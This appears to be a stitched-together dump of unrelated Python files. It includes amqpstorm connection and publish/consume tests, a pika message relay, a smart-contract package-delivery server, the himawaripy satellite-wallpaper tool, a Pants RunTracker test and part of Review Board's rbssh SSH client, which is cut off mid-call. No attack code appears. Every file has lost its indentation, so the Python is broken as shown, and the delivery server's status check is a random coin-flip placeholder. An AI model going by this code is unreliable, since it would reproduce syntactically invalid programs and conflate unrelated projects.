@setup(new_connection=False, queue=True)
def test_functional_open_multiple_channels(self):
self.connection = self.connection = Connection(HOST, USERNAME,
PASSWORD, lazy=True)
for _ in range(5):
channels = []
self.connection.open()
for index in range(10):
channel = self.connection.channel()
channels.append(channel)
# Verify that the Channel has been opened properly.
self.assertTrue(channel.is_open)
self.assertEqual(int(channel), len(channels))
self.connection.close()
@setup(new_connection=False, queue=False)
def test_functional_close_performance(self):
"""Make sure closing a connection never takes longer than ~1 seconds.
:return:
"""
for _ in range(10):
self.connection = self.connection = Connection(HOST, USERNAME,
PASSWORD)
start_time = time.time()
self.connection.close()
self.assertLess(time.time() - start_time, 3)
@setup(new_connection=False, queue=False)
def test_functional_close_after_channel_close_forced_by_server(self):
"""Make sure the channel is closed instantly when the remote server
closes it.
:return:
"""
for _ in range(10):
self.connection = self.connection = Connection(HOST, USERNAME,
PASSWORD)
self.channel = self.connection.channel(rpc_timeout=360)
start_time = time.time()
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name,
exchange='invalid')
self.channel.close()
self.assertLess(time.time() - start_time, 3)
start_time = time.time()
self.connection.close()
self.assertLess(time.time() - start_time, 3)
@setup(new_connection=False)
def test_functional_uri_connection(self):
self.connection = UriConnection(URI)
self.channel = self.connection.channel()
self.assertTrue(self.connection.is_open)
def test_functional_ssl_connection_without_ssl(self):
restore_func = sys.modules['ssl']
try:
sys.modules['ssl'] = None
imp.reload(compatibility)
self.assertIsNone(compatibility.ssl)
self.assertRaisesRegexp(
AMQPConnectionError,
'Python not compiled with support for TLSv1 or higher',
Connection, HOST, USERNAME, PASSWORD, ssl=True
)
finally:
sys.modules['ssl'] = restore_func
imp.reload(compatibility)
class PublishAndConsume1kTest(TestFunctionalFramework):
messages_to_send = 1000
messages_consumed = 0
lock = threading.Lock()
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
def consume_messages(self):
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
for message in channel.build_inbound_messages(
break_on_empty=False):
self.increment_message_count()
message.ack()
if self.messages_consumed == self.messages_to_send:
break
def increment_message_count(self):
with self.lock:
self.messages_consumed += 1
@setup(queue=True)
def test_functional_publish_and_consume_1k_messages(self):
self.channel.queue.declare(self.queue_name)
publish_thread = threading.Thread(target=self.publish_messages, )
publish_thread.daemon = True
publish_thread.start()
for _ in range(4):
consumer_thread = threading.Thread(target=self.consume_messages, )
consumer_thread.daemon = True
consumer_thread.start()
start_time = time.time()
while self.messages_consumed != self.messages_to_send:
if time.time() - start_time >= 60:
break
time.sleep(0.1)
for channel in list(self.connection.channels.values()):
channel.stop_consuming()
channel.close()
self.assertEqual(self.messages_consumed, self.messages_to_send,
'test took too long')
class Consume1kUntilEmpty(TestFunctionalFramework):
messages_to_send = 1000
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
@setup(queue=True)
def test_functional_publish_and_consume_until_empty(self):
self.channel.queue.declare(self.queue_name)
self.channel.confirm_deliveries()
self.publish_messages()
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
message_count = 0
for message in channel.build_inbound_messages(break_on_empty=True):
message_count += 1
message.ack()
result = channel.queue.declare(self.queue_name, passive=True)
self.assertEqual(result['message_count'], 0)
self.assertEqual(message_count, self.messages_to_send,
'not all messages consumed')
channel.close()
|
server.py
|
import pika
import sys
import threading
def Send(msg):
# print("msg")
# print(msg)
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='logs',
exchange_type='fanout')
message = msg
if msg != '':
channel.basic_publish(exchange='logs',
routing_key='',
body=message)
print("Sent %r" % message)
connection.close()
def Receive():
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.exchange_declare(exchange='logs',
exchange_type='fanout')
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue
channel.queue_bind(exchange='logs',
queue=queue_name)
print('Waiting for messages')
channel.queue_declare(queue='hello')
# def callback(ch, method, properties, body):
# print(" [x] %r" % body)
def callbackhello(ch, method, properties, body):
Send(body)
# print(" [c] %r" % body)
# channel.basic_consume(callback,
# queue=queue_name,
# no_ack=True)
channel.basic_consume(callbackhello,
queue='hello',
no_ack=True)
channel.start_consuming()
# send_thread = threading.Thread(target=Send(""))
receive_thread = threading.Thread(target=Receive)
# send_thread.start()
receive_thread.start()
# send_thread.join()
receive_thread.join()
|
delivery_service.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from web3.auto.infura import w3
import socketserver
import json
import cgi
import random
import sched, time
class ScrapingHTTPServer(HTTPServer):
SCRAPE_INTERVAL = 10 # scrape USPS once every 5 seconds
ERC20_ABI = json.loads('[{"constant":true,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"}],"name":"balanceOf","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"},{"name":"_spender","type":"address"}],"name":"allowance","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_from","type":"address"},{"indexed":true,"name":"_to","type":"address"},{"indexed":false,"name":"_value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"_owner","type":"address"},{"indexed":true,"name":"_spender","type":"address"},{"indexed":false,"name":"_value","type":"uint256"}],"name":"Approval","type":"event"}]')
def __init__(self, server_address, handler_class):
super(ScrapingHTTPServer, self).__init__(server_address, handler_class)
self.tracked_packages = {} # tracking number => smart contract
self.scheduler = sched.scheduler(time.time, time.sleep)
# scrape USPS once every SCRAPE_INTERVAL seconds, in a separate thread
self.scheduler.enter(self.SCRAPE_INTERVAL, 1, self._update_deliveries)
self.scraping_thread = Thread(target=self.scheduler.run)
self.scraping_thread.start()
def _update_deliveries(self):
print("Updating deliveries at time t=%s" %time.time())
delivered_packages = []
for package_number in self.tracked_packages:
if self._is_delivered(package_number):
self.tracked_packages[package_number].functions.verifyDelivery().call()
delivered_packages.append(package_number)
for package_number in delivered_packages:
del self.tracked_packages[package_number]
# schedule next update
self.scheduler.enter(self.SCRAPE_INTERVAL, 1, self._update_deliveries)
def _is_delivered(self, tracking_number):
# TODO: Add actual USPS site scraper. For now, flips a coin to determine delivery status :)
if random.random() > 0.5:
return True
return False
class Server(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
def do_HEAD(self):
self._set_headers()
def do_GET(self):
self._set_headers()
self.wfile.write(json.dumps({'remaining_deliveries': list(self.server.tracked_packages.keys())}).encode('utf-8'))
def do_POST(self):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
# refuse to receive non-json content
if ctype != 'application/json':
self.send_response(400)
self.end_headers()
return
# read the message and convert it into a python dictionary
length = int(self.headers.get('content-length'))
message = json.loads(self.rfile.read(length))
delivery_carrier = message['delivery_carrier']
tracking_number = message['tracking_number']
contract_address = message['contract_address']
# verify carrier
if delivery_carrier != 'USPS':
self.send_response(412)
self.end_headers()
return
# add the tracking number to the list of packages we track
self.server.tracked_packages[tracking_number] = w3.eth.contract(address=contract_address, abi=self.server.ERC20_ABI)
# send response
self._set_headers()
self.wfile.write(json.dumps({'received': 'ok'}).encode('utf-8'))
def run(server_class=ScrapingHTTPServer, handler_class=Server, port=8008):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print('Starting httpd on port %d...' % port)
httpd.serve_forever()
if __name__ == "__main__":
from sys import argv
if len(argv) == 2:
run(port=int(argv[1]))
else:
run()
|
__main__.py
|
#!/usr/bin/env python3
import argparse
from datetime import timedelta, datetime
import io
import itertools as it
import json
import multiprocessing as mp
import multiprocessing.dummy as mp_dummy
import os
import os.path as path
import sys
from time import strptime, strftime, mktime
import urllib.request
from glob import iglob, glob
import threading
import time
import subprocess
import appdirs
from PIL import Image, ImageDraw
from dateutil.tz import tzlocal
from .utils import set_background, get_desktop_environment
# Semantic Versioning: Major, Minor, Patch
HIMAWARIPY_VERSION = (2, 1, 0)
counter = None
HEIGHT = 550
WIDTH = 550
def calculate_time_offset(latest_date, auto, preferred_offset):
if auto:
preferred_offset = int(datetime.now(tzlocal()).strftime("%z")[0:3])
print("Detected offset: UTC{:+03d}:00".format(preferred_offset))
if 11 >= preferred_offset > 10:
preferred_offset = 10
print("Offset is greater than +10, +10 will be used...")
elif 12 >= preferred_offset > 11:
preferred_offset = -12
print("Offset is greater than +10, -12 will be used...")
himawari_offset = 10 # UTC+10:00 is the time zone that himawari is over
offset = int(preferred_offset - himawari_offset)
offset_tmp = datetime.fromtimestamp(mktime(latest_date)) + timedelta(hours=offset)
offset_time = offset_tmp.timetuple()
return offset_time
def download_chunk(args):
global counter
x, y, latest, level = args
url_format = "http://himawari8.nict.go.jp/img/D531106/{}d/{}/{}_{}_{}.png"
url = url_format.format(level, WIDTH, strftime("%Y/%m/%d/%H%M%S", latest), x, y)
tiledata = download(url)
# If the tile data is 2867 bytes, it is a blank "No Image" tile.
if tiledata.__sizeof__() == 2867:
sys.exit('No image available for {}.'.format(strftime("%Y/%m/%d %H:%M:%S", latest)))
with counter.get_lock():
counter.value += 1
if counter.value == level * level:
print("Downloading tiles: completed.")
else:
print("Downloading tiles: {}/{} completed...".format(counter.value, level * level))
return x, y, tiledata
def parse_args():
parser = argparse.ArgumentParser(description="set (near-realtime) picture of Earth as your desktop background",
epilog="http://labs.boramalper.org/himawaripy")
parser.add_argument("--version", action="version", version="%(prog)s {}.{}.{}".format(*HIMAWARIPY_VERSION))
group = parser.add_mutually_exclusive_group()
group.add_argument("--auto-offset", action="store_true", dest="auto_offset", default=False,
help="determine offset automatically")
group.add_argument("-o", "--offset", type=int, dest="offset", default=10,
help="UTC time offset in hours, must be less than or equal to +10")
parser.add_argument("-l", "--level", type=int, choices=[4, 8, 16, 20], dest="level", default=4,
help="increases the quality (and the size) of each tile. possible values are 4, 8, 16, 20")
parser.add_argument("-d", "--deadline", type=int, dest="deadline", default=6,
help="deadline in minutes to download all the tiles, set 0 to cancel")
parser.add_argument("--save-battery", action="store_true", dest="save_battery", default=False,
help="stop refreshing on battery")
parser.add_argument("--output-dir", type=str, dest="output_dir",
help="directory to save the temporary background image",
default=appdirs.user_cache_dir(appname="himawaripy", appauthor=False))
parser.add_argument("--dont-change", action="store_true", dest="dont_change", default=False,
help="don't change the wallpaper (just download it)")
parser.add_argument("-u", "--url", type=str, dest="direct_url", default=None,
help="direct url to load instead of himawari sattelite "
"(e.g. something from https://sdo.gsfc.nasa.gov/assets/img/latest")
parser.add_argument("-b", "--black_out_rect", type=str, dest="black_out_rect", default=None,
help="draw a black rectangle on some part of the image. Format: x1,x2,x3,x4 where (x1, x2)"
"and (x3, x4) are pixel coordinates of two corners of the rectangle.")
args = parser.parse_args()
if not -12 <= args.offset <= 10:
sys.exit("OFFSET has to be between -12 and +10!\n")
if not args.deadline >= 0:
sys.exit("DEADLINE has to be greater than (or equal to if you want to disable) zero!\n")
return args
def is_discharging():
if sys.platform.startswith("linux"):
if len(glob("/sys/class/power_supply/BAT*")) > 1:
print("Multiple batteries detected, using BAT0.")
with open("/sys/class/power_supply/BAT0/status") as f:
status = f.readline().strip()
return status == "Discharging"
elif sys.platform == 'darwin':
return b'discharging' in subprocess.check_output(["pmset", "-g", "batt"])
else:
sys.exit("Battery saving feature works only on linux or mac!\n")
def download(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return response.read()
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def download_image(url):
exception = None
for i in range(1, 4): # retry max 3 times
try:
with urllib.request.urlopen(url) as response:
return Image.open(response)
except Exception as e:
exception = e
print("[{}/3] Retrying to download '{}'...".format(i, url))
time.sleep(1)
pass
if exception:
raise exception
else:
sys.exit("Could not download '{}'!\n".format(url))
def download_himawari_image(level, offset=0, auto_offset=False, **_):
latest_json = download("http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json")
latest = strptime(json.loads(latest_json.decode("utf-8"))["date"], "%Y-%m-%d %H:%M:%S")
print("Latest version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", latest)))
requested_time = calculate_time_offset(latest, auto_offset, offset)
if auto_offset or offset != 10:
print("Offset version: {} GMT.".format(strftime("%Y/%m/%d %H:%M:%S", requested_time)))
png = Image.new("RGB", (WIDTH * level, HEIGHT * level))
p = mp_dummy.Pool(level * level)
print("Downloading tiles...")
res = p.map(download_chunk, it.product(range(level), range(level), (requested_time,), (level,)))
for (x, y, tiledata) in res:
tile = Image.open(io.BytesIO(tiledata))
png.paste(tile, (WIDTH * x, HEIGHT * y, WIDTH * (x + 1), HEIGHT * (y + 1)))
return png
def thread_main(args):
global counter
counter = mp.Value("i", 0)
print("Updating...")
if args.direct_url is None:
png = download_himawari_image(**args.__dict__)
else:
print(f"Attempting to download image from [{args.direct_url}]...")
png = download_image(args.direct_url).convert('RGB')
if args.black_out_rect is not None:
draw = ImageDraw.Draw(png)
coords = [int(c) for c in args.black_out_rect.split(',')]
draw.rectangle(coords, fill="black")
for file in iglob(path.join(args.output_dir, "himawari*.png")):
os.remove(file)
output_file = path.join(args.output_dir,
'himawaripy_{date:%Y-%m-%d_%H:%M:%S}.png'.format(date=datetime.now()))
print("Saving to '%s'..." % (output_file,))
os.makedirs(path.dirname(output_file), exist_ok=True)
png.save(output_file, "PNG")
if not args.dont_change:
r = set_background(output_file)
if not r:
sys.exit("Your desktop environment '{}' is not supported!\n".format(get_desktop_environment()))
else:
print("Not changing your wallpaper as requested.")
def main():
args = parse_args()
print("himawaripy {}.{}.{}".format(*HIMAWARIPY_VERSION))
if args.save_battery and is_discharging():
sys.exit("Discharging!\n")
print(f"args: {args}")
main_thread = threading.Thread(target=thread_main, args=(args,), name="himawaripy-main-thread", daemon=True)
main_thread.start()
main_thread.join(args.deadline * 60 if args.deadline else None)
if args.deadline and main_thread.is_alive():
sys.exit("Timeout!\n")
print()
sys.exit(0)
if __name__ == "__main__":
main()
|
test_run_tracker.py
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import http.server
import json
import threading
from builtins import open
from future.moves.urllib.parse import parse_qs
from pants.auth.cookies import Cookies
from pants.goal.run_tracker import RunTracker
from pants.util.contextutil import temporary_file_path
from pants_test.test_base import TestBase
class RunTrackerTest(TestBase):
def test_upload_stats(self):
stats = {'stats': {'foo': 'bar', 'baz': 42}}
class Handler(http.server.BaseHTTPRequestHandler):
def do_POST(handler):
try:
if handler.path.startswith('/redirect'):
code = int(handler.path[-3:])
handler.send_response(code)
handler.send_header('location', mk_url('/upload'))
handler.end_headers()
else:
self.assertEqual('/upload', handler.path)
self.assertEqual('application/x-www-form-urlencoded', handler.headers['Content-type'])
length = int(handler.headers['Content-Length'])
post_data = parse_qs(handler.rfile.read(length).decode('utf-8'))
decoded_post_data = {k: json.loads(v[0]) for k, v in post_data.items()}
self.assertEqual(stats, decoded_post_data)
handler.send_response(200)
except Exception:
handler.send_response(400) # Ensure the main thread knows the test failed.
raise
server_address = ('', 0)
server = http.server.HTTPServer(server_address, Handler)
host, port = server.server_address
def mk_url(path):
return 'http://{}:{}{}'.format(host, port, path)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
self.context(for_subsystems=[Cookies])
self.assertTrue(RunTracker.post_stats(mk_url('/upload'), stats))
self.assertTrue(RunTracker.post_stats(mk_url('/redirect307'), stats))
self.assertFalse(RunTracker.post_stats(mk_url('/redirect302'), stats))
server.shutdown()
server.server_close()
def test_write_stats_to_json_file(self):
# Set up
stats = {'stats': {'foo': 'bar', 'baz': 42}}
# Execute & verify
with temporary_file_path() as file_name:
self.assertTrue(RunTracker.write_stats_to_json(file_name, stats))
with open(file_name, 'r') as f:
result = json.load(f)
self.assertEqual(stats, result)
def test_create_dict_with_nested_keys_and_val(self):
keys = []
with self.assertRaises(ValueError):
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something')
keys += ['one']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': 'something'}
)
keys += ['two']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': 'something'}}
)
keys += ['three']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': 'something'}}}
)
keys += ['four']
self.assertEqual(
RunTracker._create_dict_with_nested_keys_and_val(keys, 'something'),
{'one': {'two': {'three': {'four': 'something'}}}}
)
def test_merge_list_of_keys_into_dict(self):
data = {}
keys = []
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something')
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', -1)
keys = ['key']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'something', 1)
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'O-N-E')
self.assertEqual(data, {'a': 'O-N-E'})
keys = ['one', 'two', 'three']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'T-H-R-E-E')
self.assertEqual(data, {'one': {'two': {'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A')
self.assertEqual(data, {'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E'})
keys = ['c', 'd', 'e', 'f']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'F-O-U-R')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E'}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['one', 'two', 'x', 'y']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'W-H-Y')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R'}}}
})
keys = ['c', 'd', 'e', 'g', 'h']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'H-E-L-L-O')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y'}}}, 'a': 'O-N-E',
'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['one', 'two', 'x', 'z']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'Z-E-D')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O'}}}}
})
keys = ['c', 'd', 'e', 'g', 'i']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'E-Y-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new O-N-E')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a']
RunTracker._merge_list_of_keys_into_dict(data, keys, 'L-A-L-A')
self.assertEqual(data, {
'one': {'two': {'a': 'L-A-L-A', 'three': 'T-H-R-E-E', 'x': {'y': 'W-H-Y', 'z': 'Z-E-D'}}},
'a': 'new O-N-E', 'c': {'d': {'e': {'f': 'F-O-U-R', 'g': {'h': 'H-E-L-L-O', 'i': 'E-Y-E'}}}}
})
keys = ['one', 'two', 'a', 'b', 'c']
with self.assertRaises(ValueError):
RunTracker._merge_list_of_keys_into_dict(data, keys, 'new A')
|
rbssh.py
|
#!/usr/bin/env python
#
# rbssh.py -- A custom SSH client for use in Review Board.
#
# This is used as an ssh replacement that can be used across platforms with
# a custom .ssh directory. OpenSSH doesn't respect $HOME, instead reading
# /etc/passwd directly, which causes problems for us. Using rbssh, we can
# work around this.
#
#
# Copyright (c) 2010-2011 Beanbag, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import getpass
import logging
import os
import select
import sys
import warnings
from optparse import OptionParser
# We don't want any warnings to end up impacting output.
warnings.simplefilter('ignore')
if str('RBSITE_PYTHONPATH') in os.environ:
for path in reversed(os.environ[str('RBSITE_PYTHONPATH')].split(str(':'))):
sys.path.insert(1, path)
os.environ[str('DJANGO_SETTINGS_MODULE')] = \
str('reviewboard.cmdline.conf.rbssh.settings')
import django
import paramiko
from django.utils import six
import reviewboard
from reviewboard import get_version_string
DEBUG = os.getenv('RBSSH_DEBUG') or os.getenv('DEBUG_RBSSH')
DEBUG_LOGDIR = os.getenv('RBSSH_LOG_DIR')
STORAGE_BACKEND = os.getenv('RBSSH_STORAGE_BACKEND')
SSH_PORT = 22
options = None
if DEBUG:
debug = logging.debug
else:
debug = lambda *args, **kwargs: None
class PlatformHandler(object):
"""A generic base class for wrapping platform-specific operations.
This should be subclassed for each major platform.
"""
def __init__(self, channel):
"""Initialize the handler."""
self.channel = channel
if six.PY3:
self.write_stdout = sys.stdout.buffer.write
self.write_stderr = sys.stderr.buffer.write
else:
self.write_stdout = sys.stdout.write
self.write_stderr = sys.stderr.write
def shell(self):
"""Open a shell."""
raise NotImplementedError
def transfer(self):
"""Transfer data over the channel."""
raise NotImplementedError
def process_channel(self, channel):
"""Process the given channel."""
if channel.closed:
return False
debug('!! process_channel\n')
if channel.recv_ready():
data = channel.recv(4096)
if not data:
debug('!! stdout empty\n')
return False
self.write_stdout(data)
sys.stdout.flush()
if channel.recv_stderr_ready():
data = channel.recv_stderr(4096)
if not data:
debug('!! stderr empty\n')
return False
self.write_stderr(data)
sys.stderr.flush()
if channel.exit_status_ready():
debug('!!! exit_status_ready\n')
return False
return True
def process_stdin(self, channel):
"""Read data from stdin and send it over the channel."""
debug('!! process_stdin\n')
try:
buf = os.read(sys.stdin.fileno(), 1)
except OSError:
buf = None
if not buf:
debug('!! stdin empty\n')
return False
channel.send(buf)
return True
class PosixHandler(PlatformHandler):
"""A platform handler for POSIX-type platforms."""
def shell(self):
"""Open a shell."""
import termios
import tty
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
self.handle_communications()
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def transfer(self):
"""Transfer data over the channel."""
import fcntl
fd = sys.stdin.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
self.handle_communications()
def handle_communications(self):
"""Handle any pending data over the channel or stdin."""
while True:
rl, wl, el = select.select([self.channel, sys.stdin], [], [])
if self.channel in rl:
if not self.process_channel(self.channel):
break
if sys.stdin in rl:
if not self.process_stdin(self.channel):
self.channel.shutdown_write()
break
class WindowsHandler(PlatformHandler):
"""A platform handler for Microsoft Windows platforms."""
def shell(self):
"""Open a shell."""
self.handle_communications()
def transfer(self):
"""Transfer data over the channel."""
self.handle_communications()
def handle_communications(self):
"""Handle any pending data over the channel or stdin."""
import threading
debug('!! begin_windows_transfer\n')
self.channel.setblocking(0)
def writeall(channel):
while self.process_channel(channel):
pass
debug('!! Shutting down reading\n')
channel.shutdown_read()
writer = threading.Thread(target=writeall, args=(self.channel,))
writer.start()
try:
while self.process_stdin(self.channel):
pass
except EOFError:
pass
debug('!! Shutting down writing\n')
self.channel.shutdown_write()
def print_version(option, opt, value, parser):
"""Print the current version and exit."""
parser.print_version()
sys.exit(0)
def parse_options(args):
"""Parse the given arguments into the global ``options`` dictionary."""
global options
hostname = None
# NOTE: Update to use RBProgVersionAction when this is ported to argparse.
parser = OptionParser(
usage='%prog [options] [user@]hostname [command]',
version=(
'%%prog %s\n'
'Python %s\n'
'Installed to %s'
% (get_version_string(),
sys.version.splitlines()[0],
os.path.dirname(reviewboard.__file__))
))
parser.disable_interspersed_args()
parser.add_option('-l',
dest='username', metavar='USERNAME', default=None,
help='the user to log in as on the remote machine')
parser.add_option('-p', '--port',
type='int', dest='port', metavar='PORT', default=None,
help='the port to connect to')
parser.add_option('-q', '--quiet',
action='store_true', dest='quiet', default=False,
help='suppress any unnecessary output')
parser.add_option('-s',
dest='subsystem', metavar='SUBSYSTEM', default=None,
nargs=2,
help='the subsystem to use (ssh or sftp)')
parser.add_option('-V',
action='callback', callback=print_version,
help='display the version information and exit')
parser.add_option('--rb-disallow-agent',
action='store_false', dest='allow_agent',
default=os.getenv('RBSSH_ALLOW_AGENT') != '0',
help='disable using the SSH agent for authentication')
parser.add_option('--rb-local-site',
dest='local_site_name', metavar='NAME',
default=os.getenv('RB_LOCAL_SITE'),
help='the local site name containing the SSH keys to '
'use')
(options, args) = parser.parse_args(args)
if options.subsystem:
if len(options.subsystem) != 2:
parser.error('-s requires a hostname and a valid subsystem')
elif options.subsystem[1] not in ('sftp', 'ssh'):
parser.error('Invalid subsystem %s' % options.subsystem[1])
hostname, options.subsystem = options.subsystem
if len(args) == 0 and not hostname:
parser.print_help()
sys.exit(1)
if not hostname:
hostname = args[0]
args = args[1:]
if options.port:
port = options.port
else:
port = SSH_PORT
return hostname, port, args
def main():
"""Run the application."""
if DEBUG:
pid = os.getpid()
log_filename = 'rbssh-%s.log' % pid
if DEBUG_LOGDIR:
log_path = os.path.join(DEBUG_LOGDIR, log_filename)
else:
log_path = log_filename
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(name)-18s %(levelname)-8s '
'%(message)s',
datefmt='%m-%d %H:%M',
filename=log_path,
filemode='w')
debug('%s', sys.argv)
debug('PID %s', pid)
# Ensure we've patched Djblets for Python 3.10 + Django 1.11 compatibility.
# This can be removed once we've moved onto a modern version of Django.
import djblets
# Perform the bare minimum to initialize the Django/Review Board
# environment. We're not calling Review Board's initialize() because
# we want to completely minimize what we import and set up.
if hasattr(django, 'setup'):
django.setup()
from reviewboard.scmtools.core import SCMTool
from reviewboard.ssh.client import SSHClient
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(logging.Formatter('%(message)s'))
ch.addFilter(logging.Filter('root'))
logging.getLogger('').addHandler(ch)
path, port, command = parse_options(sys.argv[1:])
if '://' not in path:
path = 'ssh://' + path
username, hostname = SCMTool.get_auth_from_uri(path, options.username)
if username is None:
username = getpass.getuser()
client = SSHClient(namespace=options.local_site_name,
storage_backend=STORAGE_BACKEND)
client.set_missing_host_key_policy(paramiko.WarningPolicy())
if command:
purpose = command
else:
purpose = 'interactive shell'
debug('!!! SSH backend = %s', type(client.storage))
debug('!!! Preparing to connect to %s@%s for %s',
